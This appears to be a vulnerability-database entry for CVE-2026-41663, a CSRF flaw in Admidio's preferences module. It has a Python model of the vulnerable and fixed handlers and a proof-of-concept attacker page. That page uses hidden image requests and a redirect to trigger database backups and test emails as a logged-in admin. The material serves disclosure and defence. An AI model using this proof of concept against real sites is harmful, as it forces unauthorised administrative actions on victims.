Security Vulnerability Report
CVE-2026-41663 CVSS 3.5 LOW

CVE-2026-41663

Published: 2026-05-07 04:16:30
Last Modified: 2026-05-07 14:51:02

Description

Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) are triggered by GET requests with no CSRF token validation. Because a SameSite=Lax cookie is still sent on a cross-site top-level GET navigation (a link or a redirect), an attacker can force an authenticated administrator to trigger these actions simply by luring them to a malicious page. This issue has been patched in version 5.0.9.
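The following is an added illustration, not Admidio's code: a Python model of the vulnerable handler shape (any method, session cookie alone authorises) beside the hardened shape (POST only, session-bound CSRF token compared in constant time), driven through a simulated browser that applies the SameSite=Lax rule. The action names, session store and handler names are hypothetical; the point it makes is which cross-site delivery methods (hidden image, top-level navigation, auto-submitted form) actually carry the admin's Lax cookie, and why only the token check closes the hole for cookies that are not Lax.

```python
"""Model of the CVE-2026-41663 pattern (admin actions on GET, no CSRF token)
versus the POST + token fix. Illustrative only; not Admidio's code."""
import hmac
import secrets
from dataclasses import dataclass

# Hypothetical names for the three actions the advisory lists.
ADMIN_ACTIONS = {"backup", "test_email", "htaccess"}

# One logged-in admin session (constructed); the CSRF token is a per-session secret.
SESSIONS = {"s1": {"role": "admin", "csrf": secrets.token_hex(32)}}


@dataclass
class Request:
    method: str
    params: dict
    cookies: dict  # only the cookies the browser chose to attach


def lax_cookie_attached(method: str, top_level: bool, cross_site: bool) -> bool:
    """Browser rule for a SameSite=Lax cookie: always sent same-site; cross-site
    only on a top-level navigation using a safe method. An <img>, <script> or
    fetch() subresource request is never top-level, so it gets no cookie."""
    if not cross_site:
        return True
    return top_level and method in ("GET", "HEAD")


def vulnerable_handler(req: Request, executed: list) -> int:
    """Pre-fix shape: any HTTP method, no token; the session cookie alone authorises."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if not sess or sess["role"] != "admin":
        return 401
    action = req.params.get("mode")
    if action not in ADMIN_ACTIONS:
        return 400
    executed.append(action)
    return 200


def hardened_handler(req: Request, executed: list) -> int:
    """Fixed shape: state changes only on POST, and the request must carry the
    session-bound token, checked with a constant-time comparison."""
    if req.method != "POST":
        return 405
    sess = SESSIONS.get(req.cookies.get("session"))
    if not sess or sess["role"] != "admin":
        return 401
    if not hmac.compare_digest(req.params.get("csrf_token", ""), sess["csrf"]):
        return 403
    action = req.params.get("mode")
    if action not in ADMIN_ACTIONS:
        return 400
    executed.append(action)
    return 200


def browser_request(handler, *, method, top_level, cross_site, params):
    """Simulate the victim's browser (logged in as admin, SameSite=Lax session
    cookie) issuing one request. Returns (status, actions_executed)."""
    cookies = {"session": "s1"} if lax_cookie_attached(method, top_level, cross_site) else {}
    executed = []
    status = handler(Request(method, params, cookies), executed)
    return status, executed


def scenarios(handler):
    """Three attacker-page deliveries (cross-site) and one legitimate admin submit."""
    return {
        "img_tag":    browser_request(handler, method="GET",  top_level=False, cross_site=True,  params={"mode": "backup"}),
        "navigation": browser_request(handler, method="GET",  top_level=True,  cross_site=True,  params={"mode": "backup"}),
        "auto_form":  browser_request(handler, method="POST", top_level=True,  cross_site=True,  params={"mode": "backup"}),
        "legit_post": browser_request(handler, method="POST", top_level=True,  cross_site=False,
                                      params={"mode": "backup", "csrf_token": SESSIONS["s1"]["csrf"]}),
    }


if __name__ == "__main__":
    for name, h in (("vulnerable", vulnerable_handler), ("hardened", hardened_handler)):
        for sc, (status, done) in scenarios(h).items():
            print(f"{name:10} {sc:10} -> {status} executed={done}")
```

Against the vulnerable handler only the top-level navigation succeeds under Lax, which is exactly the delivery the advisory describes; the hidden-image variant fails because no cookie travels with it. Against the hardened handler the navigation is refused on method, and a cross-site POST is refused either by the browser (no Lax cookie) or, if the cookie were SameSite=None, by the token check.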

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)


Admidio < 5.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Proof of Concept for CVE-2026-41663 -->
<!-- Attacker hosts this page and tricks the Admin into visiting it -->
<html>
<body>
<h1>You are being redirected...</h1>

<!-- Example: Triggering Database Backup via GET.
     Caveat: an <img> request is a cross-site subresource, not a top-level
     navigation, so a SameSite=Lax session cookie is NOT attached to it.
     This variant only fires if the session cookie is SameSite=None (or the
     browser does not enforce SameSite). -->
<img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8" style="display:none;" />

<!-- Example: Triggering Test Email via GET (same caveat as above) -->
<img src="http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=9" style="display:none;" />

<script>
// A top-level navigation is what carries a SameSite=Lax cookie, which is the
// delivery the advisory describes; uncomment to use it instead of the images.
// window.location.href = "http://target-site.com/adm_program/modules/preferences/preferences_function.php?mode=8";
</script>
</body>
</html>

References

https://github.com/Admidio/admidio/releases/tag/v5.0.9
https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41663", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:30.243", "lastModified": "2026-05-07T14:51:01.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because SameSite=Lax cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}